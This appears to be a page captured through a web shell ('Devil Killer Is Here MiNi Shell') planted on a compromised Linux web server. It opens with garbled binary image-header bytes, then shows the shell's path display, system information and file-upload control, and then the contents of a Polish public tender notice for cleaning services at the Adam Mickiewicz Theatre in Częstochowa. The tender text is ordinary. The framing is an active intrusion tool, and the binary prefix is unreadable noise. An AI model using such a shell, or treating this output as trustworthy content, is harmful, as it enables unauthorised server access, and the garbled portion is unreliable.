JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250906/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250906/0041020901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi sprzątania w obiektach Teatru im. Adama Mickiewicza w Częstochowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">TEATR IM.ADAMA MICKIEWICZA W CZĘSTOCHOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000279255</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Kilińskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Częstochowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(34) 372 33 04</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrekcja@teatr-mickiewicza.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.teatr-mickiewicza.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi sprzątania w obiektach Teatru im. Adama Mickiewicza w Częstochowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e6e6755a-e860-4ce6-97c3-a9f5acda153b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00410209</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00388287/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi sprzątania w obiektach Teatru im. Adama Mickiewicza w Częstochowie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e6e6755a-e860-4ce6-97c3-a9f5acda153b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">KOMUNIKACJA MIĘDZY ZAMAWIAJĄCYM A WYKONAWCAMI odbywa się za pośrednictwem formularzy portalu e-Zamówienia: https://ezamowienia.gov.pl/pl/ lub poczty elektronicznej d.sedziwy@teatr-mickiewicza.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem formularzy udostępnionych za pośrednictwem portalu e-Zamówienia https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-e6e6755a-e860-4ce6-97c3-a9f5acda153b w zakładce „Formularze”, a także za pomocą poczty e-mail: d.sedziwy@teatr-mickiewicza.pl<br/>2.1. Ofertę oraz dokumenty dot. postępowania należy składać przy użyciu portalu e-Zamówienia https://ezamowienia.gov.pl/pl/ lub w przypadkach uzasadnionych np. udokumentowanej awarii systemu portalu e-Zamówienia, itp, ofertę można złożyć elektronicznie za pośrednictwem poczty, na adres e-mail: d.sedziwy@teatr-mickiewicza.pl, liczy się wówczas data i godzina wpłynięcia korespondencji na serwer Zamawiającego.<br/>2.2. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń ( inna niż oferta Wykonawcy i załączniki do oferty ) składane winny być przez Wykonawcę elektronicznie za pośrednictwem jednej z możliwości:<br/>2.2.1. dedykowanego formularza udostępnionego przez portal e-Zamówienia (korespondencja przesłana za pomocą tego formularza nie może być szyfrowana)<br/>2.2.2. poczty elektronicznej, na adres e-mail: d.sedziwy@teatr-mickiewicza.pl<br/>2.3. Zamawiający rekomenduje następujące formaty danych: .pdf oraz .zip, .7z (formaty poddające dane kompresji) a w przypadku przekazywania wiadomości przy użyciu środków komunikacji elektronicznej jako tekst wpisany bezpośrednio do niej.<br/>3.	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia BZP lub nr sprawy a także identyfikatorem postępowania podanym na portalu e-Zamówienia.<br/>4.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z portalu e-Zamówienia, dostępnym pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu <br/>5.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z portalu e-Zamówienia, określone w Regulaminie portalu e-Zamówienia oraz zobowiązuje się korzystając z portalu e-Zamówienia przestrzegać postanowień tego regulaminu.<br/>6.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 100MB.<br/>7.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust.1. PZP podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na portalu e-Zamówienia lub otrzymania na serwer poczty elektronicznej Zamawiającego, na e-mail: d.sedziwy@teatr-mickiewicza.pl<br/>8.	Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. <br/>9.	Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Adam Stępniak, Damian Sędziwy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Celem realizacji obowiązku wynikającego z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 r., zwanego dalej: „RODO”), Zamawiający informuje Wykonawcę, że w stosunku do danych osobowych osób fizycznych, których przetwarzanie jest niezbędne dla realizacji Przedmiotu umowy: <br/>1.	Administratorem danych osobowych jest Teatr im. Adama Mickiewicza w Częstochowie z siedzibą w Częstochowie, ul. Kilińskiego 15, 42-202 Częstochowa;<br/>2.	Administrator wyznaczył Pełnomocnika Ochrony Danych, z którym można skontaktować się poprzez e-mail: m.szydlowski@teatr-mickiewicza.pl w każdej sprawie dotyczącej przetwarzania danych osobowych. <br/>3.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b, c, f RODO, tj. w celu związanym z postępowaniem o udzielenie zamówienia, zawarcia i wykonania umowy. <br/>4.	Dane osobowe będą przechowywane do wygaśnięcia roszczeń przysługujących Zamawiającemu z tytułu umowy, a także gwarancji za wady Przedmiotu umowy, ze względu na prawnie uzasadniony interes Administratora. <br/>5.	W odniesieniu do przetwarzanych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, o którym mowa w art. 22 RODO, ani przekazywane do państwa trzeciego. <br/>6.	Osobie fizycznej, której dane są przetwarzane, przysługuje: <br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania jej danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników); <br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych narusza przepisy RODO. <br/>7.	Osobie fizycznej, której dane osobowe są przetwarzane, nie przysługuje: <br/>a)	w związku z art. 17 ust. 3 lit. „b”, „d” lub „e” RODO prawo do usunięcia danych osobowych; <br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c)	na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. „b” i „c” RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z obowiązującymi przepisami.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/05/08/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 250000 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 203252 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa sprzątania budynku Teatru im. Adama Mickiewicza, obejmująca w szczególności: <br/>a) kompleksowe sprzątanie oraz utrzymanie bieżącej czystości i porządku w budynkach ,,A” i ,,B” Teatru im. A. Mickiewicza na 5-ciu poziomach.<br/>b) bieżącego utrzymania czystości wokół budynków teatru oraz ,,Domu Aktora” przy ul. Dąbrowskiego 65, wraz z odśnieżaniem chodników, parkingów oraz placów w sezonie zimowym a także zamiataniem tych samych miejsc w okresie letnim - wg standardów i wymogów BHP, przepisów prawa bud. i zarządzeń obowiązujących w Teatrze, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90911200-8 - Usługi sprzątania budynków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-11-10 do 2026-06-09</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> W razie potrzeb Zamawiającego ogłoszenie o zamówienie publiczne planuje się ogłosić na okres 15.09.2026 do 15 06 2027r. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki:<br/>a) Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 pkt 12-23 oraz ust. 5 pkt 1. i pkt 2. ustawy Pzp, <br/>b)	Posiadają zdolności do występowania w obrocie gospodarczym,<br/>c)	Prowadzą działalność w zakresie świadczenia usług objętych przedmiotem zamówienia,<br/>d) Dysponują zasobami kadrowymi, zdolnymi i uprawnionymi do wykonywania czynności związanych z realizacją zamówienia, posiadających doświadczenie w świadczeniu usług sprzątania na rzecz jednostek publicznych, w szczególności: instytucji kultury, teatrów, filharmonii itp. <br/>e) Oświadczą, że przedmiot zamówienia będą wykonywać bez udziału podwykonawców,<br/>f) Dysponują właściwym sprzętem i środkami niezbędnymi do wykonania zamówienia,<br/>g)	Spełniają warunki udziału w postępowaniu określonym przez Zamawiającego w warunkach zamówienia,<br/>h)	W skalkulowanej cenie brutto, Wykonawcy uwzględnią wszystkie koszty wykonania zamówienia i realizacji przyszłego świadczenia umownego,<br/>i)	W ofercie nie zastosują cen dumpingowych,<br/>j)	Oświadczą, że złożona przez nich oferta nie stanowi czynu nieuczciwej konkurencji w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji,<br/>k)	Posiadają doświadczenie w wykonywaniu usług objętych przedmiotem zamówienia, tj. wykonywaniem co najmniej 2 usług sprzątania na rzecz instytucji kultury w okresie ostatnich trzech lat, o wartości kontraktu co najmniej 30.000,00 zł netto każda,<br/>l)	Nie podlegają wykluczeniu z postępowania Wykonawcy, o których mowa w art. 108 ust. 1 lub art. 109. ustawy Pzp,<br/>m)	Akceptują warunki płatności określone przez Zamawiającego w Specyfikacji Warunków Zamówienia (wzór umowy – załącznik nr 5 do SWZ),<br/>n) Zapoznali się z warunkami zamówienia i nie wnoszą do nich zastrzeżeń oraz zdobyli konieczne informacje, potrzebne do właściwego wykonania zamówienia,<br/>o) Akceptują czas związania ze złożoną ofertą,<br/>p)	Akceptują wzór umowy i zobowiązują się w przypadku wybrania oferty do zawarcia umowy na wymienionych warunkach, w miejscu i terminie wyznaczonym przez Zamawiającego.- załącznik nr 5 do SWZ.<br/>q)	Wypełniają obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskane w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu,<br/>2. Złożą oświadczenia o nie zaleganiu w opłacaniu podatków oraz składek na ubezpieczenia,<br/>3. Złożą kopię polisy ubezpieczeniowej OC, w zakresie prowadzenia działalności gospodarczej na kwotę co najmniej 100 000.00 zł brutto,<br/>4. W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają powyższe warunki udziału w postępowaniu z pkt 1-3, co potwierdzają wypełniając oświadczenie z załącznika Nr 2 i załącznika nr 3 do Specyfikacji Warunków Zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie zgodnie z SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, należy dostarczyć poniższe dokumenty:<br/>1.	Formularz oferty – załącznik nr 4 do SWZ<br/>2.	Oświadczenia o: załącznik nr 2 do SWZ<br/>a) prowadzeniu działalności w zakresie świadczenia usług objętych przedmiotem zamówienia, posiadających doświadczenie w świadczeniu usług sprzątania na rzecz jednostek publicznych, w szczególności: instytucji kultury, teatrów, filharmonii itp. <br/>b) dysponowaniu osobami zdolnymi i uprawnionymi do wykonywania czynności związanych z realizacją zamówienia,<br/>c) wykonaniu zamówienia bez udziału podwykonawców,<br/>d) dysponowaniu właściwym sprzętem i środkami niezbędnymi do wykonania zamówienia,<br/>e) spełnieniu warunków udziału w postępowaniu określonych przez Zamawiającego w warunkach zamówienia,<br/>f) skalkulowaniu ceny brutto w sposób uwzględniający wszystkie koszty wykonania zamówienia i realizacji przyszłego świadczenia umownego,<br/>g) nie stosowaniu ceny dumpingowej w ofercie, <br/>h) tym, że złożona oferta nie stanowi czynu nieuczciwej konkurencji w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji,<br/>i) posiadaniu doświadczenia w wykonywaniu usług objętych przedmiotem zamówienia, tj. wykonałem 2 usługi sprzątania na rzecz instytucji kultury w okresie ostatnich trzech lat, o wartości kontraktu co najmniej 30.000,00 zł netto każda,<br/>j) posiadaniu ubezpieczenia OC w zakresie prowadzenia działalności gospodarczej na kwotę co najmniej 100 000.00 zł brutto,<br/>k) nie podleganiu wykluczenia z postępowania , o którym mowa w art. 108 ust. 1 PZP,<br/>l) akceptacji warunków płatności określonych przez Zamawiającego w warunkach zamówienia (wzór umowy – załącznik nr 5 do SWZ,<br/>m) zapoznaniu się z warunkami zamówienia i o nie wnoszeniu do nich zastrzeżeń oraz o zdobyciu koniecznych informacji potrzebnych do właściwego wykonania zamówienia,<br/>n) akceptacji czasu związania ofertą,<br/>o) akceptacji wzoru umowy i zobowiązaniu się w przypadku wybrania złożonej oferty do jej zawarcia, na wymienionych warunkach, w miejscu i terminie wyznaczonym przez Zamawiającego.- załącznik nr 5 do SWZ,<br/>p) wypełnieniu obowiązku informacyjnego przewidzianego w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskałem w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.<br/>3.	Złożeniu oświadczenia o nie zaleganiu w opłacaniu podatków oraz składek na ubezpieczenia – załącznik nr 3 do SWZ,<br/>4.	Złożeniu kopii polisy ubezpieczeniowej OC.<br/>5.	Wykaz usług – referencje (co najmniej dwie), sprzątania budynków na rzecz instytucji kultury w okresie ostatnich trzech lat, o wartości kontraktu co najmniej 30.000,00 zł netto.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zgodnie z SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia i dokumenty zgodnie z SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wyboru oferty najkorzystniejszej wykonawców wspólnie ubiegających się o udzielenie zamówienia przed podpisaniem umowy Wykonawcy przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców a Wykonawca, najpóźniej w dniu podpisania umowy zobowiązany jest dostarczyć ww. umowę do Zamawiającego. <h3 